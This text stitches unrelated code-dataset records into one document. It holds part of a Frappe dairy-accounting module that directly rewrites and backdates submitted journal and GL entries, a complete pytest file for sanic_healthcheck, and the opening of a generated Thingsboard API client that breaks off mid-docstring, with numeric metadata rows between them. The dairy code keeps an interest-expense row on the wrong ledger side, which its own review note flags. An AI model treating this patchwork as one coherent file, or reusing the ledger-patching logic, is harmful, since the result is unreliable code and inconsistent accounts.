    frappe.db.set_value("Journal Entry", je_no, 'posting_date', self.collection_to)
    self.update_gl_entry_vlcc_advance(je_no, row.amount)
def update_dairy_je_for_loan(self, row, cycle, je_no):
    """Rewrite a submitted dairy loan-recovery JE with re-split amounts.

    Debtors is debited with principal + interest; Loans and Advances and
    Interest Income are credited with principal and interest respectively.
    """
    split = get_interest_amount(row.amount, row.loan_id)
    dairy = frappe.db.get_value("Company", {'is_dairy': 1},
        ['name', 'abbr', 'cost_center'], as_dict=1)
    debtors_row = frappe.db.get_value("Journal Entry Account",
        {'parent': je_no, 'account': "Debtors - " + dairy.get('abbr')}, 'name')
    principal_row = frappe.db.get_value("Journal Entry Account",
        {'parent': je_no, 'account': "Loans and Advances - " + dairy.get('abbr')}, 'name')
    interest_row = frappe.db.get_value("Journal Entry Account",
        {'parent': je_no, 'account': "Interest Income - " + dairy.get('abbr')}, 'name')
    frappe.db.set_value("Journal Entry Account", debtors_row,
        'debit_in_account_currency', flt(split.get('principal') + split.get('interest'), 2))
    frappe.db.set_value("Journal Entry Account", principal_row,
        'credit_in_account_currency', flt(split.get('principal'), 2))
    frappe.db.set_value("Journal Entry Account", interest_row,
        'credit_in_account_currency', flt(split.get('interest'), 2))
    frappe.db.set_value("Journal Entry", je_no, 'total_credit', row.amount)
    frappe.db.set_value("Journal Entry", je_no, 'total_debit', row.amount)
    frappe.db.set_value("Journal Entry", je_no, 'posting_date', self.collection_to)
    self.update_gl_entry_dairy_loan(je_no, split)
def update_vlcc_je_for_loan(self, row, cycle, je_no):
    """Rewrite a submitted VLCC loan-recovery JE with re-split amounts.

    Loans and Advances Payable and Interest Expense are debited with
    principal and interest; Creditors is credited with the total.
    """
    split = get_interest_amount(row.amount, row.loan_id)
    vlcc = frappe.db.get_value("Company", self.vlcc_name,
        ['abbr', 'cost_center'], as_dict=1)
    creditors_row = frappe.db.get_value("Journal Entry Account",
        {'parent': je_no, 'account': "Creditors - " + vlcc.get('abbr')}, 'name')
    principal_row = frappe.db.get_value("Journal Entry Account",
        {'parent': je_no, 'account': "Loans and Advances Payable - " + vlcc.get('abbr')}, 'name')
    interest_row = frappe.db.get_value("Journal Entry Account",
        {'parent': je_no, 'account': "Interest Expense - " + vlcc.get('abbr')}, 'name')
    frappe.db.set_value("Journal Entry Account", principal_row,
        'debit_in_account_currency', split.get('principal'))
    frappe.db.set_value("Journal Entry Account", interest_row,
        'debit_in_account_currency', split.get('interest'))
    frappe.db.set_value("Journal Entry Account", creditors_row,
        'credit_in_account_currency', split.get('principal') + split.get('interest'))
    frappe.db.set_value("Journal Entry", je_no, 'total_credit', row.amount)
    frappe.db.set_value("Journal Entry", je_no, 'total_debit', row.amount)
    frappe.db.set_value("Journal Entry", je_no, 'posting_date', self.collection_to)
    self.update_gl_entry_vlcc_loan(je_no, split)
def update_gl_entry_dairy_advance(self, je_no, amount):
    """Patch a dairy advance JE's GL rows to the new amount and backdate them.

    The Loans and Advances row takes the credit side, the Debtors row the
    debit side (mirroring the original posting). Posting dates are set to
    the cycle end for the receive/pay and net payoff reports.
    """
    if not je_no:
        return
    dairy = frappe.db.get_value("Company", {'is_dairy': 1},
        ['name', 'abbr'], as_dict=1)
    advances_row = frappe.db.get_value("GL Entry",
        {"account": 'Loans and Advances - ' + dairy.get('abbr'), "voucher_no": je_no}, "name")
    debtors_row = frappe.db.get_value("GL Entry",
        {"account": "Debtors - " + dairy.get('abbr'), "voucher_no": je_no}, "name")
    field_updates = [
        # Loans and Advances: credited.
        (advances_row, "debit", 0),
        (advances_row, "credit", amount),
        (advances_row, "credit_in_account_currency", amount),
        (advances_row, "debit_in_account_currency", 0),
        (advances_row, "posting_date", self.collection_to),
        # Debtors: debited.
        (debtors_row, "debit", amount),
        (debtors_row, "credit", 0),
        (debtors_row, "credit_in_account_currency", 0),
        (debtors_row, "debit_in_account_currency", amount),
        (debtors_row, "posting_date", self.collection_to),
    ]
    for gl_name, fieldname, value in field_updates:
        frappe.db.set_value("GL Entry", gl_name, fieldname, value)
def update_gl_entry_dairy_loan(self, je_no, principal_interest):
    """Patch the GL Entries of a dairy loan-recovery JE with new amounts.

    Debtors carries the full recovery as a debit; Loans and Advances and
    Interest Income carry the principal and interest credits. All three
    rows are backdated to the cycle end date (self.collection_to).

    :param je_no: Journal Entry name whose GL rows are patched
    :param principal_interest: dict with 'principal' and 'interest'
    """
    if not (je_no and principal_interest):
        return
    dairy = frappe.db.get_value("Company", {'is_dairy': 1},
        ['name', 'abbr'], as_dict=1)
    debtors_row = frappe.db.get_value("GL Entry",
        {"account": "Debtors - " + dairy.get('abbr'), "voucher_no": je_no}, "name")
    principal_row = frappe.db.get_value("GL Entry",
        {"account": "Loans and Advances - " + dairy.get('abbr'), "voucher_no": je_no}, "name")
    interest_row = frappe.db.get_value("GL Entry",
        {"account": "Interest Income - " + dairy.get('abbr'), "voucher_no": je_no}, "name")
    principal = flt(principal_interest.get('principal'), 2)
    interest = flt(principal_interest.get('interest'), 2)
    total_amount = flt(principal_interest.get('principal') + principal_interest.get('interest'), 2)
    # (removed a leftover debug print and a junk comment)
    # Debtors: debit the full recovered amount.
    frappe.db.set_value("GL Entry", debtors_row, "debit", total_amount)
    frappe.db.set_value("GL Entry", debtors_row, "credit", 0)
    frappe.db.set_value("GL Entry", debtors_row, "credit_in_account_currency", 0)
    frappe.db.set_value("GL Entry", debtors_row, "debit_in_account_currency", total_amount)
    frappe.db.set_value("GL Entry", debtors_row, "posting_date", self.collection_to)
    # Loans and Advances: credit the principal portion.
    frappe.db.set_value("GL Entry", principal_row, "credit", principal)
    frappe.db.set_value("GL Entry", principal_row, "debit", 0)
    frappe.db.set_value("GL Entry", principal_row, "credit_in_account_currency", principal)
    frappe.db.set_value("GL Entry", principal_row, "debit_in_account_currency", 0)
    frappe.db.set_value("GL Entry", principal_row, "posting_date", self.collection_to)
    # Interest Income: credit the interest portion.
    # BUGFIX: the old code set debit_in_account_currency twice and never
    # zeroed 'debit' on this row (cf. update_gl_entry_vlcc_loan).
    frappe.db.set_value("GL Entry", interest_row, "credit", interest)
    frappe.db.set_value("GL Entry", interest_row, "debit", 0)
    frappe.db.set_value("GL Entry", interest_row, "credit_in_account_currency", interest)
    frappe.db.set_value("GL Entry", interest_row, "debit_in_account_currency", 0)
    frappe.db.set_value("GL Entry", interest_row, "posting_date", self.collection_to)
def update_gl_entry_vlcc_advance(self, je_no, amount):
    """Patch the GL Entries of a VLCC advance JE to the new amount.

    Creditors is credited and Loans and Advances Payable is debited with
    the recovered amount; both rows are backdated to the cycle end date
    for the receive/pay and net payoff reports.
    """
    if not je_no:
        return
    abbr = frappe.db.get_value("Company", self.vlcc_name, 'abbr')
    creditors_row = frappe.db.get_value("GL Entry",
        {"account": 'Creditors - ' + abbr, "voucher_no": je_no}, "name")
    payable_row = frappe.db.get_value("GL Entry",
        {"account": "Loans and Advances Payable - " + abbr, "voucher_no": je_no}, "name")
    # (removed a leftover debug print)
    # Creditors: credited with the recovered amount.
    frappe.db.set_value("GL Entry", creditors_row, "debit", 0)
    frappe.db.set_value("GL Entry", creditors_row, "credit", amount)
    frappe.db.set_value("GL Entry", creditors_row, "credit_in_account_currency", amount)
    frappe.db.set_value("GL Entry", creditors_row, "debit_in_account_currency", 0)
    frappe.db.set_value("GL Entry", creditors_row, "posting_date", self.collection_to)
    # Loans and Advances Payable: debited with the recovered amount.
    frappe.db.set_value("GL Entry", payable_row, "debit", amount)
    frappe.db.set_value("GL Entry", payable_row, "credit", 0)
    frappe.db.set_value("GL Entry", payable_row, "credit_in_account_currency", 0)
    frappe.db.set_value("GL Entry", payable_row, "debit_in_account_currency", amount)
    frappe.db.set_value("GL Entry", payable_row, "posting_date", self.collection_to)
def update_gl_entry_vlcc_loan(self, je_no, principal_interest):
    """Patch the GL Entries of a VLCC loan-recovery JE with new amounts.

    Loans and Advances Payable is debited with the principal and Creditors
    is credited with principal + interest; all rows are backdated to the
    cycle end date.

    NOTE(review): the Interest Expense row is written on the credit side
    here although the JE posts it as a debit — preserved as-is from the
    original code; confirm against the posting logic.

    :param je_no: Journal Entry name whose GL rows are patched
    :param principal_interest: dict with 'principal' and 'interest'
    """
    if not (je_no and principal_interest):
        return
    vlcc = frappe.db.get_value("Company", self.vlcc_name,
        ['abbr', 'name'], as_dict=1)
    payable_row = frappe.db.get_value("GL Entry",
        {"account": "Loans and Advances Payable - " + vlcc.get('abbr'), "voucher_no": je_no}, "name")
    creditors_row = frappe.db.get_value("GL Entry",
        {"account": "Creditors - " + vlcc.get('abbr'), "voucher_no": je_no}, "name")
    interest_row = frappe.db.get_value("GL Entry",
        {"account": "Interest Expense - " + vlcc.get('abbr'), "voucher_no": je_no}, "name")
    principal = flt(principal_interest.get('principal'), 2)
    interest = flt(principal_interest.get('interest'), 2)
    total_amount = flt(principal_interest.get('principal') + principal_interest.get('interest'), 2)
    # (removed a leftover debug print and a junk comment)
    frappe.db.set_value("GL Entry", payable_row, "debit", principal)
    frappe.db.set_value("GL Entry", payable_row, "credit", 0)
    frappe.db.set_value("GL Entry", payable_row, "credit_in_account_currency", 0)
    frappe.db.set_value("GL Entry", payable_row, "debit_in_account_currency", principal)
    frappe.db.set_value("GL Entry", payable_row, "posting_date", self.collection_to)
    frappe.db.set_value("GL Entry", creditors_row, "debit", 0)
    frappe.db.set_value("GL Entry", creditors_row, "credit", total_amount)
    frappe.db.set_value("GL Entry", creditors_row, "credit_in_account_currency", total_amount)
    frappe.db.set_value("GL Entry", creditors_row, "debit_in_account_currency", 0)
    frappe.db.set_value("GL Entry", creditors_row, "posting_date", self.collection_to)
    frappe.db.set_value("GL Entry", interest_row, "debit", 0)
    frappe.db.set_value("GL Entry", interest_row, "credit", interest)
    frappe.db.set_value("GL Entry", interest_row, "credit_in_account_currency", interest)
    frappe.db.set_value("GL Entry", interest_row, "debit_in_account_currency", 0)
    frappe.db.set_value("GL Entry", interest_row, "posting_date", self.collection_to)
def update_advance_after_vpcr(self, row):
    """Refresh a Vlcc Advance's outstanding/EMI figures after VPCR posting.

    Outstanding = advance amount minus the sum of submitted 'Vlcc Advance'
    JEs for this advance; paid instalments = number of cycle child rows.
    EMI is re-spread over the remaining instalments, and the advance is
    marked Paid once fully recovered.
    """
    je_amt = frappe.get_all("Journal Entry",
        fields=['ifnull(sum(total_debit), 0) as amt'],
        filters={'vlcc_advance': row.adv_id, 'type': 'Vlcc Advance', 'company': self.vlcc_name})
    adv_doc = frappe.get_doc("Vlcc Advance", row.adv_id)
    adv_doc.outstanding_amount = float(adv_doc.advance_amount) - je_amt[0].get('amt')
    # len() replaces the old manual counting loop over the child table.
    adv_doc.paid_instalment = len(adv_doc.cycle)
    if adv_doc.outstanding_amount > 0:
        remaining = float(adv_doc.no_of_instalment) + float(adv_doc.extension) - float(adv_doc.paid_instalment)
        adv_doc.emi_amount = float(adv_doc.outstanding_amount) / remaining
    if adv_doc.outstanding_amount == 0:
        adv_doc.status = "Paid"
        adv_doc.emi_amount = 0
    adv_doc.flags.ignore_permissions = True
    adv_doc.save()
def update_loan_vpcr_je(self, row):
    """Refresh a Vlcc Loan's outstanding/EMI figures after VPCR posting.

    Mirrors update_advance_after_vpcr for the Vlcc Loan doctype (loan JEs
    are also linked via the `vlcc_advance` field on Journal Entry).
    """
    je_amt = frappe.get_all("Journal Entry",
        fields=['ifnull(sum(total_debit), 0) as amt'],
        filters={'vlcc_advance': row.loan_id, 'type': 'Vlcc Loan', 'company': self.vlcc_name})
    loan_doc = frappe.get_doc("Vlcc Loan", row.loan_id)
    loan_doc.outstanding_amount = float(loan_doc.advance_amount) - je_amt[0].get('amt')
    # len() replaces the old manual counting loop over the child table.
    loan_doc.paid_instalment = len(loan_doc.cycle)
    if loan_doc.outstanding_amount > 0:
        remaining = float(loan_doc.no_of_instalments) + float(loan_doc.extension) - float(loan_doc.paid_instalment)
        loan_doc.emi_amount = float(loan_doc.outstanding_amount) / remaining
    if loan_doc.outstanding_amount == 0:
        loan_doc.status = "Paid"
        loan_doc.emi_amount = 0
    loan_doc.flags.ignore_permissions = True
    loan_doc.save()
def update_advance_doc(self, row, je=None):
    """Register this cycle's recovery on a Vlcc Advance and refresh totals.

    Appends a cycle child row (linking the posted voucher `je`),
    recomputes the outstanding amount from all submitted 'Vlcc Advance'
    JEs, and re-spreads the EMI over the remaining instalments.
    """
    je_amt = frappe.get_all("Journal Entry",
        fields=['ifnull(sum(total_debit), 0) as amt'],
        filters={'vlcc_advance': row.adv_id, 'type': 'Vlcc Advance', 'company': self.vlcc_name})
    adv_doc = frappe.get_doc("Vlcc Advance", row.adv_id)
    adv_doc.append("cycle", {"cycle": self.cycle, "sales_invoice": je})
    adv_doc.outstanding_amount = float(adv_doc.advance_amount) - je_amt[0].get('amt')
    # len() replaces the old manual counting loop; also removed a debug print.
    adv_doc.paid_instalment = len(adv_doc.cycle)
    if adv_doc.outstanding_amount > 0:
        remaining = float(adv_doc.no_of_instalment) + float(adv_doc.extension) - float(adv_doc.paid_instalment)
        adv_doc.emi_amount = float(adv_doc.outstanding_amount) / remaining
    if adv_doc.outstanding_amount == 0:
        adv_doc.status = "Paid"
        adv_doc.emi_amount = 0
    adv_doc.flags.ignore_permissions = True
    adv_doc.save()
def update_loan_je(self, row, je=None):
    """Register this cycle's recovery on a Vlcc Loan and refresh totals.

    Appends a cycle child row (linking the posted voucher `je`),
    recomputes the outstanding amount from all submitted 'Vlcc Loan' JEs,
    and re-spreads the EMI over the remaining instalments.
    """
    je_amt = frappe.get_all("Journal Entry",
        fields=['ifnull(sum(total_debit), 0) as amt'],
        filters={'vlcc_advance': row.loan_id, 'type': 'Vlcc Loan', 'company': self.vlcc_name})
    loan_doc = frappe.get_doc("Vlcc Loan", row.loan_id)
    loan_doc.append("cycle", {"cycle": self.cycle, "sales_invoice": je})
    loan_doc.outstanding_amount = float(loan_doc.advance_amount) - je_amt[0].get('amt')
    # len() replaces the old manual counting loop over the child table.
    loan_doc.paid_instalment = len(loan_doc.cycle)
    if loan_doc.outstanding_amount > 0:
        remaining = float(loan_doc.no_of_instalments) + float(loan_doc.extension) - float(loan_doc.paid_instalment)
        loan_doc.emi_amount = float(loan_doc.outstanding_amount) / remaining
    if loan_doc.outstanding_amount == 0:
        loan_doc.status = "Paid"
        loan_doc.emi_amount = 0
    loan_doc.flags.ignore_permissions = True
    loan_doc.save()
def create_incentive(self):
    """Book the cycle's milk incentive as a Purchase Invoice in the dairy
    company's books (supplier = this VLCC), then backdate the invoice and
    its two GL rows to the cycle end date."""
    dairy = frappe.db.get_value("Company", {'is_dairy': 1}, 'name')
    invoice = frappe.new_doc("Purchase Invoice")
    invoice.supplier = self.vlcc_name
    invoice.company = dairy
    invoice.pi_type = "Incentive"
    invoice.cycle = self.cycle
    invoice.append("items", {
        "qty": 1,
        "item_code": "Milk Incentives",
        "rate": self.incentives,
        "amount": self.incentives,
        "cost_center": frappe.db.get_value("Company", self.vlcc_name, "cost_center"),
    })
    invoice.flags.ignore_permissions = True
    invoice.save()
    invoice.submit()
    # Force the posting date to the current cycle's end date.
    frappe.db.set_value("Purchase Invoice", invoice.name, 'posting_date', self.collection_to)
    stock_account = frappe.db.get_value("Company", dairy, 'stock_received_but_not_billed')
    payable_account = frappe.db.get_value("Company", dairy, 'default_payable_account')
    frappe.db.set_value("GL Entry",
        {'account': stock_account, 'voucher_no': invoice.name},
        'posting_date', self.collection_to)
    frappe.db.set_value("GL Entry",
        {'account': payable_account, 'voucher_no': invoice.name},
        'posting_date', self.collection_to)
def get_interest_amount(amount, data):
    """Split a cycle recovery `amount` into interest and principal parts.

    Per-cycle interest is the loan's total interest divided evenly across
    its instalments. If the recovery does not cover one cycle's interest,
    it is applied entirely to interest and principal is 0.

    :param amount: amount recovered this cycle
    :param data: Vlcc Loan document name
    :return: dict with 'interest' and 'principal', both rounded to 2 dp
    """
    loan = frappe.get_all("Vlcc Loan",
        fields=['interest', 'no_of_instalments', 'emi_amount'],
        filters={'name': data})
    per_cycle = loan[0].get('interest') / loan[0].get('no_of_instalments')
    if amount <= per_cycle:
        return {'interest': flt(amount, 2), 'principal': 0}
    interest = flt(per_cycle, 2)
    return {'interest': interest, 'principal': flt(amount - interest, 2)}
@frappe.whitelist()
def get_vmcr(start_date, end_date, vlcc, cycle=None):
    """Collect a VLCC's milk-collection records for a date range together
    with the derived payables (incentive, due loan/advance rows, feed and
    fodder total).

    :return: dict consumed by the VPCR/VMCR client page
    """
    # SECURITY: parameterized query — the old version interpolated the
    # whitelisted (client-supplied) arguments straight into the SQL.
    vmcr = frappe.db.sql("""
        select rcvdtime, shift, milkquantity, fat, snf, rate, amount
        from `tabVlcc Milk Collection Record`
        where associated_vlcc = %s and date(rcvdtime) between %s and %s
        """, (vlcc, start_date, end_date), as_dict=1)
    amount = 0
    qty = 0
    for record in vmcr:
        amount += record.get('amount')
        qty += record.get('milkquantity')
    amount = flt(amount, 2)
    return {
        "vmcr": vmcr,
        "incentive": get_incentives(amount, qty, vlcc) or 0,
        "vlcc_child_loan": get_vlcc_loans_child(start_date, end_date, vlcc, cycle),
        "vlcc_child_advance": get_vlcc_advance_child(start_date, end_date, vlcc, cycle),
        "feed_and_fodder": get_mi_raised(start_date, end_date, vlcc)
    }
def get_incentives(amount, qty, vlcc=None):
    """Compute the VLCC incentive from the Dairy Setting single doc.

    Per-litre rate when enabled, otherwise a percentage of the amount.

    :return: incentive as a number; 0 when inputs are missing or no rate
        is configured (the old version implicitly returned None — callers
        already guarded with `or 0`, so this is backward-compatible)
    """
    if not (vlcc and amount and qty):
        return 0
    dairy_setting = frappe.get_doc("Dairy Setting")
    if dairy_setting.enable_per_litre and dairy_setting.per_litre:
        return float(dairy_setting.per_litre) * float(qty)
    if not dairy_setting.enable_per_litre and dairy_setting.vlcc_incentives:
        return (float(dairy_setting.vlcc_incentives) * float(amount)) / 100
    return 0
def get_vlcc_loans_child(start_date, end_date, vlcc, cycle=None):
    """Return the submitted, still-outstanding Vlcc Loans of `vlcc` whose
    recovery falls due in `cycle` (per req_cycle_computation).

    :return: list of loan rows (dicts)
    """
    # SECURITY: parameterized query instead of str.format interpolation.
    rows = frappe.db.sql("""
        select name, outstanding_amount,
            emi_amount, no_of_instalments, paid_instalment, advance_amount,
            emi_deduction_start_cycle, extension, date_of_disbursement, vlcc_id
        from `tabVlcc Loan`
        where outstanding_amount != 0
            and vlcc_id = %s
            and date_of_disbursement < now() and docstatus = 1
        """, (vlcc,), as_dict=1)
    # Call req_cycle_computation once per row (the old code called it twice).
    return [row for row in rows if cycle in req_cycle_computation(row)]
def get_vlcc_advance_child(start_date, end_date, vlcc, cycle=None):
    """Return the submitted, still-outstanding Vlcc Advances of `vlcc`
    whose recovery falls due in `cycle` (per req_cycle_computation_advance).

    :return: list of advance rows (dicts)
    """
    # SECURITY: parameterized query instead of str.format interpolation.
    rows = frappe.db.sql("""
        select name, outstanding_amount, emi_amount, advance_amount,
            no_of_instalment, paid_instalment, emi_deduction_start_cycle,
            extension, date_of_disbursement, vlcc
        from `tabVlcc Advance`
        where outstanding_amount != 0
            and vlcc = %s
            and date_of_disbursement < now() and docstatus = 1
        """, (vlcc,), as_dict=1)
    return [row for row in rows if cycle in req_cycle_computation_advance(row)]
def req_cycle_computation(data):
    """Return the cycle names in which an instalment of this Vlcc Loan is due.

    The first `emi_deduction_start_cycle` cycles on/after the disbursement
    date are skipped; the remaining window is limited to
    no_of_instalments + extension cycles.

    :param data: dict-like Vlcc Loan row (date_of_disbursement,
        emi_deduction_start_cycle, no_of_instalments, extension)
    :return: list of 'Cyclewise Date Computation' names (possibly empty)
    """
    disbursed = data.get('date_of_disbursement')
    if data.get('emi_deduction_start_cycle') > 0:
        # Cycles covered by the deduction holiday, excluded below.
        # (parameterized; dropped the stray debug flags and the unused
        # vlcc_id format argument of the old query)
        skipped = frappe.db.sql("""
            select name
            from `tabCyclewise Date Computation`
            where %(date)s < start_date
                or date(%(date)s) between start_date and end_date
            order by start_date limit %(limit)s""",
            {'date': disbursed,
             'limit': int(data.get('emi_deduction_start_cycle'))}, as_dict=1)
        instalment = int(data.get('no_of_instalments')) + int(data.get('extension'))
        # Guard the IN clause against an empty list (the advance variant
        # already did this; the old code crashed on `in ()`).
        if skipped:
            req_cycle = frappe.db.sql("""
                select name
                from `tabCyclewise Date Computation`
                where %(date)s <= end_date and name not in %(skipped)s
                order by start_date limit %(limit)s""",
                {'date': disbursed,
                 'skipped': tuple(row.get('name') for row in skipped),
                 'limit': instalment}, as_dict=1)
            return [row.get('name') for row in req_cycle]
    elif data.get('emi_deduction_start_cycle') == 0:
        instalment = int(data.get('no_of_instalments')) + int(data.get('extension'))
        req_cycle = frappe.db.sql("""
            select name
            from `tabCyclewise Date Computation`
            where %(date)s <= end_date
            order by start_date limit %(limit)s""",
            {'date': disbursed, 'limit': instalment}, as_dict=1)
        return [row.get('name') for row in req_cycle]
    return []
def req_cycle_computation_advance(data):
    """Return the cycle names in which an instalment of this Vlcc Advance is due.

    Mirrors req_cycle_computation but reads the advance's field names
    (`no_of_instalment` instead of `no_of_instalments`).

    :param data: dict-like Vlcc Advance row
    :return: list of 'Cyclewise Date Computation' names (possibly empty)
    """
    disbursed = data.get('date_of_disbursement')
    if data.get('emi_deduction_start_cycle') > 0:
        # Cycles covered by the deduction holiday, excluded below.
        # (parameterized instead of str.format interpolation)
        skipped = frappe.db.sql("""
            select name
            from `tabCyclewise Date Computation`
            where %(date)s < start_date
                or date(%(date)s) between start_date and end_date
            order by start_date limit %(limit)s""",
            {'date': disbursed,
             'limit': int(data.get('emi_deduction_start_cycle'))}, as_dict=1)
        instalment = int(data.get('no_of_instalment')) + int(data.get('extension'))
        if skipped:
            req_cycle = frappe.db.sql("""
                select name
                from `tabCyclewise Date Computation`
                where %(date)s <= end_date and name not in %(skipped)s
                order by start_date limit %(limit)s""",
                {'date': disbursed,
                 'skipped': tuple(row.get('name') for row in skipped),
                 'limit': instalment}, as_dict=1)
            return [row.get('name') for row in req_cycle]
    elif data.get('emi_deduction_start_cycle') == 0:
        instalment = int(data.get('no_of_instalment')) + int(data.get('extension'))
        req_cycle = frappe.db.sql("""
            select name
            from `tabCyclewise Date Computation`
            where %(date)s <= end_date
            order by start_date limit %(limit)s""",
            {'date': disbursed, 'limit': instalment}, as_dict=1)
        return [row.get('name') for row in req_cycle]
    return []
def get_mi_raised(start_date, end_date, vlcc):
    """Total of the VLCC's Sales Invoices in the date range, excluding the
    'Vlcc Advance' / 'Vlcc Loan' recovery invoices.

    :return: grand total as a number; 0 when there are no matching
        invoices (the old version returned None because SUM() over an
        empty set is NULL)
    """
    # SECURITY: parameterized query instead of str.format interpolation.
    result = frappe.db.sql("""
        select sum(grand_total)
        from `tabSales Invoice` si
        where si.customer = %s
            and si.posting_date between %s and %s
            and si.type not in ('Vlcc Advance', 'Vlcc Loan')
        """, (vlcc, start_date, end_date), as_list=1)
    if result and result[0][0]:
        return result[0][0]
    return 0
@frappe.whitelist()
def get_updated_loan(cycle, data, loan_id=None, amount=None, total=None, vlcc=None):
    """Remaining recoverable amount across the loan child rows: the sum of
    'principle' minus the sum of the overriding 'amount' values."""
    parsed = json.loads(data)
    principle_total = 0
    override_total = 0
    for child in parsed.get('vlcc_loan_child'):
        principle_total += child.get('principle')
        override_total += child.get('amount')
    return flt(principle_total - override_total, 2) or 0
@frappe.whitelist()
def get_updated_advance(cycle, data, adv_id=None, amount=None, total=None, vlcc=None):
    """Remaining recoverable amount across the advance child rows: the sum
    of 'principle' minus the sum of the overriding 'amount' values."""
    parsed = json.loads(data)
    principle_total = 0
    override_total = 0
    for child in parsed.get('vlcc_advance_child'):
        principle_total += child.get('principle')
        override_total += child.get('amount')
    return flt(principle_total - override_total, 2) or 0
@frappe.whitelist()
def get_vpcr_flag():
    """Return the `is_vpcr` flag from the Dairy Setting single document."""
    settings = frappe.get_doc("Dairy Setting")
    return settings.as_dict().get('is_vpcr')
@frappe.whitelist()
def get_cycle(doctype, text, searchfields, start, pagelen, filters):
    """Link-field query returning past cycles (end_date < now) whose name
    matches the typed text.

    BUGFIX: the old version passed `as_list=True` to str.format() instead
    of frappe.db.sql() (misplaced parenthesis) and interpolated `text`
    into the SQL unescaped; the LIKE pattern is now a bound parameter.
    """
    return frappe.db.sql("""
        select name
        from `tabCyclewise Date Computation`
        where end_date < now() and name like %s
        """, ('%%%s%%' % text,), as_list=True)
| 47.57638
| 180
| 0.724165
| 5,563
| 37,062
| 4.542873
| 0.048355
| 0.0478
| 0.035692
| 0.051915
| 0.84742
| 0.830366
| 0.813469
| 0.788659
| 0.757558
| 0.733737
| 0
| 0.005792
| 0.124143
| 37,062
| 779
| 181
| 47.57638
| 0.772743
| 0.011953
| 0
| 0.573295
| 0
| 0
| 0.284949
| 0.050843
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.011611
| null | null | 0.011611
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
00a711daf1dd9eabeedd551a568acd0430c7d948
| 1,653
|
py
|
Python
|
tests/test_handlers.py
|
edaniszewski/sanic-healthcheck
|
25acc8c7fe71a9802ad83f95c5ed01354fc868fb
|
[
"MIT"
] | 3
|
2020-07-17T05:19:17.000Z
|
2022-02-20T04:16:48.000Z
|
tests/test_handlers.py
|
edaniszewski/sanic-healthcheck
|
25acc8c7fe71a9802ad83f95c5ed01354fc868fb
|
[
"MIT"
] | null | null | null |
tests/test_handlers.py
|
edaniszewski/sanic-healthcheck
|
25acc8c7fe71a9802ad83f95c5ed01354fc868fb
|
[
"MIT"
] | null | null | null |
import json
import math
import time
from sanic_healthcheck import handlers
def test_json_success_handler():
    """The success handler serializes results into a JSON 'success' payload."""
    checks = [{'test': 'foo'}, {'test': 'bar'}]
    started = time.time()
    payload = handlers.json_success_handler(checks)
    assert isinstance(payload, str)
    body = json.loads(payload)
    assert isinstance(body, dict)
    assert body['status'] == 'success'
    assert math.isclose(body['timestamp'], started, rel_tol=1)
    assert body['results'] == checks
def test_json_success_handler_no_results():
    """An empty result list still yields a well-formed 'success' payload."""
    started = time.time()
    payload = handlers.json_success_handler([])
    assert isinstance(payload, str)
    body = json.loads(payload)
    assert isinstance(body, dict)
    assert body['status'] == 'success'
    assert math.isclose(body['timestamp'], started, rel_tol=1)
    assert body['results'] == []
def test_json_failure_handler():
    """The failure handler serializes results into a JSON 'failure' payload."""
    checks = [{'test': 'foo'}, {'test': 'bar'}]
    started = time.time()
    payload = handlers.json_failure_handler(checks)
    assert isinstance(payload, str)
    body = json.loads(payload)
    assert isinstance(body, dict)
    assert body['status'] == 'failure'
    assert math.isclose(body['timestamp'], started, rel_tol=1)
    assert body['results'] == checks
def test_json_failure_handler_no_results():
    """An empty result list still yields a well-formed 'failure' payload."""
    started = time.time()
    payload = handlers.json_failure_handler([])
    assert isinstance(payload, str)
    body = json.loads(payload)
    assert isinstance(body, dict)
    assert body['status'] == 'failure'
    assert math.isclose(body['timestamp'], started, rel_tol=1)
    assert body['results'] == []
| 22.643836
| 60
| 0.656382
| 193
| 1,653
| 5.471503
| 0.160622
| 0.121212
| 0.041667
| 0.064394
| 0.939394
| 0.91572
| 0.892045
| 0.892045
| 0.86553
| 0.780303
| 0
| 0.003051
| 0.206897
| 1,653
| 72
| 61
| 22.958333
| 0.802441
| 0
| 0
| 0.708333
| 0
| 0
| 0.087167
| 0
| 0
| 0
| 0
| 0
| 0.416667
| 1
| 0.083333
| false
| 0
| 0.083333
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
971abf0ab7f8dfbbdebb0348c938e0cb37b948f7
| 53,849
|
py
|
Python
|
tb_api_client/swagger_client/apis/device_controller_api.py
|
MOSAIC-LoPoW/oss7-thingsboard-backend-example
|
9b289dd7fdbb6e932ca338ad497a7bb1fc84d010
|
[
"Apache-2.0"
] | 5
|
2017-11-27T15:48:16.000Z
|
2020-09-21T04:18:47.000Z
|
tb_api_client/swagger_client/apis/device_controller_api.py
|
MOSAIC-LoPoW/oss7-thingsboard-backend-example
|
9b289dd7fdbb6e932ca338ad497a7bb1fc84d010
|
[
"Apache-2.0"
] | null | null | null |
tb_api_client/swagger_client/apis/device_controller_api.py
|
MOSAIC-LoPoW/oss7-thingsboard-backend-example
|
9b289dd7fdbb6e932ca338ad497a7bb1fc84d010
|
[
"Apache-2.0"
] | 6
|
2018-01-14T17:23:46.000Z
|
2019-06-24T13:38:54.000Z
|
# coding: utf-8
"""
Thingsboard REST API
For instructions how to authorize requests please visit <a href='http://thingsboard.io/docs/reference/rest-api/'>REST API documentation page</a>.
OpenAPI spec version: 2.0
Contact: info@thingsboard.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..api_client import ApiClient
class DeviceControllerApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    # Fall back to a fresh default ApiClient when none is injected.
    if api_client is None:
        api_client = ApiClient()
    self.api_client = api_client
def assign_device_to_customer_using_post(self, customer_id, device_id, **kwargs):
    """
